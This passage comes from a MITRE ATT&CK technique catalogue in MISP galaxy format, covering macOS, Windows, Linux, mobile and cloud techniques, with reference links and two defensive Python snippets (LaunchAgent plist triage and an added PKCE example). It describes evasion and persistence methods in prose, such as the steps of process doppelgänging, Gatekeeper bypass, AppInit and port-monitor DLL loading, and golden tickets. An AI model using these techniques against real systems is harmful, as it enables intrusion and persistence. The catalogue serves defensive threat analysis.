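    for sample in (BENIGN_PLIST, SUSPICIOUS_PLIST):
        result = triage_launch_agent(sample)
        print(result["label"], result["findings"])
```

On a live host the same function can be fed the bytes of each file under the three LaunchAgents directories; binary plists are handled by plistlib as well.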

The tag is: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001"

Table 6073. Table References

Links

https://attack.mitre.org/techniques/T1543/001

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Web Protocols - T1437.001

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server.

Web protocols such as HTTP and HTTPS are used for web traffic as well as for notification services native to mobile messaging services such as Google Cloud Messaging (GCM) and, more recently, Firebase Cloud Messaging (FCM) (GCM/FCM: two-way communication) and Apple Push Notification Service (APNS; one-way server-to-device). Such notification services leverage HTTP/S via the respective API and are commonly abused on Android and iOS respectively in order to blend in with routine device traffic, making it difficult for enterprises to inspect.

The tag is: misp-galaxy:mitre-attack-pattern="Web Protocols - T1437.001"

Table 6074. Table References

Links

https://attack.mitre.org/techniques/T1437/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html

Gatekeeper Bypass - T1553.001

Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as a layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization)

Based on an opt-in system, when files are downloaded an extended attribute (xattr) called com.apple.quarantine (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:

  1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)

  2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.

  3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.

  4. Notarization - Using the api.apple-cloudkit.com API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.

Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)

Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

The tag is: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001"

Table 6075. Table References

Links

https://attack.mitre.org/techniques/T1553/001

https://eclecticlight.co/2020/08/28/how-notarization-works/

https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

https://redcanary.com/blog/mac-application-bundles/

https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

Process Doppelgänging - T1055.013

Adversaries may inject malicious code into a process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)

Adversaries may abuse TxF to perform a fileless variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging’s use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. (Citation: BlackHat Process Doppelgänging Dec 2017)

Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):

  • Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.

  • Load – Create a shared section of memory and load the malicious executable.

  • Rollback – Undo changes to original executable, effectively removing malicious code from the file system.

  • Animate – Create a process from the tainted section of memory and initiate execution.

This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1055.013"

Table 6076. Table References

Links

https://attack.mitre.org/techniques/T1055/013

https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/

https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx

https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx

https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx

https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx

https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf

SSH Hijacking - T1563.001

Adversaries may hijack a legitimate user’s SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)

[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001"

Table 6077. Table References

Links

https://attack.mitre.org/techniques/T1563/001

https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident

https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf

https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking

https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219

URI Hijacking - T1635.001

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If an adversary were to register for a URI that was already in use by a genuine application, the adversary may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the adversary to gain access to protected resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)
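An added example (not code from MISP or MITRE) of the mitigation the cited IETF-PKCE reference (RFC 7636) describes: the client binds the authorization code to a secret code_verifier via an S256 code_challenge, so an app that hijacks the redirect URI and intercepts the code cannot redeem it without the verifier. The toy AuthorizationServer class is an assumption standing in for a real server:

```python
"""PKCE (RFC 7636): bind an OAuth authorization code to the requesting client."""
import base64
import hashlib
import secrets
from typing import Dict, Tuple


def b64url_no_pad(data: bytes) -> str:
    """Base64url without '=' padding, as RFC 7636 Appendix A specifies."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def make_code_verifier(n_bytes: int = 32) -> str:
    """High-entropy verifier; 32 random bytes encode to 43 unreserved chars."""
    return b64url_no_pad(secrets.token_bytes(n_bytes))


def make_code_challenge(verifier: str) -> str:
    """S256 method: BASE64URL(SHA256(ASCII(code_verifier)))."""
    return b64url_no_pad(hashlib.sha256(verifier.encode("ascii")).digest())


class AuthorizationServer:
    """Toy server: remembers the challenge bound to each issued code."""

    def __init__(self) -> None:
        self._codes: Dict[str, Tuple[str, str]] = {}

    def authorize(self, code_challenge: str, method: str = "S256") -> str:
        """Authorization endpoint: issue a code tied to the presented challenge."""
        code = secrets.token_urlsafe(16)
        self._codes[code] = (code_challenge, method)
        return code

    def token(self, code: str, code_verifier: str) -> bool:
        """Token endpoint: redeem the code only if the verifier matches."""
        entry = self._codes.pop(code, None)  # codes are single-use
        if entry is None:
            return False
        challenge, method = entry
        if method != "S256":                 # refuse the weaker 'plain' method
            return False
        return secrets.compare_digest(make_code_challenge(code_verifier), challenge)


def legitimate_flow(server: AuthorizationServer) -> bool:
    """Genuine app: generates the verifier, sends its challenge, redeems the code."""
    verifier = make_code_verifier()
    code = server.authorize(make_code_challenge(verifier))
    return server.token(code, verifier)


def hijacked_flow(server: AuthorizationServer) -> bool:
    """The redirect carrying the code lands in an app that never saw the verifier."""
    verifier = make_code_verifier()
    code = server.authorize(make_code_challenge(verifier))
    return server.token(code, make_code_verifier())  # hijacker can only guess
```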

The tag is: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1635.001"

Table 6078. Table References

Links

https://attack.mitre.org/techniques/T1635/001

https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/

https://developer.android.com/training/app-links/index.html

https://tools.ietf.org/html/rfc7636

https://tools.ietf.org/html/rfc8252

Symmetric Cryptography - T1573.001

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

The tag is: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001"

Table 6079. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1573/001

Outlook Rules - T1137.005

Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005"

Table 6080. Table References

Links

https://attack.mitre.org/techniques/T1137/005

https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

https://github.com/sensepost/notruler

https://silentbreaksecurity.com/malicious-outlook-rules/

Social Media - T1593.001

Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.

Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victims into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media - T1593.001"

Table 6081. Table References

Links

https://attack.mitre.org/techniques/T1593/001

https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e

Calendar Entries - T1636.001

Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the EventKit framework.

If the device has been jailbroken or rooted, an adversary may be able to access [Calendar Entries](https://attack.mitre.org/techniques/T1636/001) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="Calendar Entries - T1636.001"

Table 6082. Table References

Links

https://attack.mitre.org/techniques/T1636/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

VDSO Hijacking - T1055.014

Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process.

VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="VDSO Hijacking - T1055.014"

Table 6083. Table References

Links

http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

https://attack.mitre.org/techniques/T1055/014

https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/

https://lwn.net/Articles/604515/

https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/

https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html

https://www.gnu.org/software/acct/

AppInit DLLs - T1546.010

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)

Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)

The tag is: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010"

Table 6084. Table References

Links

https://attack.mitre.org/techniques/T1546/010

https://msdn.microsoft.com/en-us/library/dn280412

https://support.microsoft.com/en-us/kb/197571

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Port Monitors - T1547.010

Adversaries may use port monitors to run an adversary-supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port

  • Standard TCP/IP Port

  • USB Monitor

  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010"

Table 6085. Table References

Links

http://msdn.microsoft.com/en-us/library/dd183341

https://attack.mitre.org/techniques/T1547/010

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf

Identify Roles - T1591.004

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004"

Table 6086. Table References

Links

https://attack.mitre.org/techniques/T1591/004

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

System Checks - T1497.001

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters' addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMware, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative of a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"

Table 6087. Table References

Links

https://attack.mitre.org/techniques/T1497/001

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/

Golden Ticket - T1558.001

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection)

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)

The KDC service runs on all domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.

The tag is: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001"

Table 6088. Table References

Links

https://adsecurity.org/?p=1515

https://adsecurity.org/?p=1640

https://adsecurity.org/?p=483

https://attack.mitre.org/techniques/T1558/001

https://blog.stealthbits.com/detect-pass-the-ticket-attacks

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285

Spearphishing Attachment - T1566.001

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001"

Table 6089. Table References

Links

https://attack.mitre.org/techniques/T1566/001

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Create Snapshot - T1578.001

An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.

An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Create Snapshot - T1578.001"

Table 6090. Table References

Links

https://attack.mitre.org/techniques/T1578/001

https://cloud.google.com/compute/docs/instances/create-start-instance#api_2

https://cloud.google.com/logging/docs/audit#admin-activity

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html

https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor

Spearphishing Service - T1598.001

Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Service - T1598.001"

Table 6091. Table References

Links

https://attack.mitre.org/techniques/T1598/001

https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/

Component Firmware - T1542.002

Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.

Malicious component firmware could provide both persistent access to systems that survives the usual losses of access and hard disk re-imaging, and a way to evade host software-based defenses and integrity checks.

The tag is: misp-galaxy:mitre-attack-pattern="Component Firmware - T1542.002"

Table 6092. Table References

Links

https://attack.mitre.org/techniques/T1542/002

https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

https://www.smartmontools.org/

User Evasion - T1628.002

Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.

While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.

The tag is: misp-galaxy:mitre-attack-pattern="User Evasion - T1628.002"

Table 6093. Table References

Links

https://attack.mitre.org/techniques/T1628/002

Device Lockout - T1629.002

An adversary may seek to inhibit user interaction by locking the legitimate user out of the device. This is typically accomplished by requesting device administrator permissions and then locking the screen using <code>DevicePolicyManager.lockNow()</code>. Other novel techniques for locking the user out of the device have been observed, such as showing a persistent overlay, using carefully crafted “call” notification screens, and locking HTML pages in the foreground. These techniques can be very difficult to get around, and typically require booting the device into safe mode to uninstall the malware.(Citation: Microsoft MalLockerB)(Citation: Talos GPlayed)(Citation: securelist rotexy 2018)

Prior to Android 7, device administrators were able to reset the device lock passcode to prevent the user from unlocking the device. The release of Android 7 introduced updates that only allow device or profile owners (e.g. MDMs) to reset the device’s passcode.(Citation: Android resetPassword)

The tag is: misp-galaxy:mitre-attack-pattern="Device Lockout - T1629.002"

Table 6094. Table References

Links

https://attack.mitre.org/techniques/T1629/002

https://blog.talosintelligence.com/2018/10/gplayedtrojan.html

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/

Systemd Service - T1543.002

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configuration files with the <code>.service</code> file extension to encode information about a service’s process. By default, system-level unit files are stored in a <code>/systemd/system</code> directory under root-owned locations (<code>/</code>). User-level unit files are stored in a <code>/systemd/user</code> directory under the user-owned home directory (<code>$HOME</code>).(Citation: lambert systemd 2022)

Inside the .service unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)

  • ExecStart, ExecStartPre, and ExecStartPost directives execute when a service is started manually by systemctl or on system start if the service is set to automatically start.

  • ExecReload directive executes when a service restarts.

  • ExecStop, ExecStopPre, and ExecStopPost directives execute when a service is stopped.

Adversaries have created new service files, altered the commands a .service file’s directive executes, and modified the user directive a .service file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002"

Table 6095. Table References

Links

http://man7.org/linux/man-pages/man1/systemd.1.html

http://www.ouah.org/backdoors.html

